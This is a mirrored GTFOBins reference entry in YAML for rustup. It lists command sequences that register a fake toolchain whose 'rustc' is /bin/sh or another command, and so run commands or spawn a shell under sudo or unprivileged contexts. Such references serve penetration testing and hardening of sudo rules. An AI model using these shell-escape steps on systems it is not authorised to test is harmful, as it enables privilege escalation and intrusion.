mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-03-07 14:36:23 +01:00
25 lines
592 B
Plaintext
25 lines
592 B
Plaintext
---
|
|
functions:
|
|
command:
|
|
- code: |-
|
|
mkdir /path/to/temp-dir/bin/
|
|
mkdir /path/to/temp-dir/lib/
|
|
echo '/path/to/command' >/path/to/temp-dir/bin/rustc
|
|
chmod +x /path/to/temp-dir/bin/rustc
|
|
rustup toolchain link x /path/to/temp-dir/
|
|
rustup run x rustc
|
|
contexts:
|
|
sudo:
|
|
unprivileged:
|
|
shell:
|
|
- code: |-
|
|
mkdir /path/to/temp-dir/bin/
|
|
mkdir /path/to/temp-dir/lib/
|
|
cp /bin/sh /path/to/temp-dir/bin/rustc
|
|
rustup toolchain link x /path/to/temp-dir/
|
|
rustup run x rustc
|
|
contexts:
|
|
sudo:
|
|
unprivileged:
|
|
...
|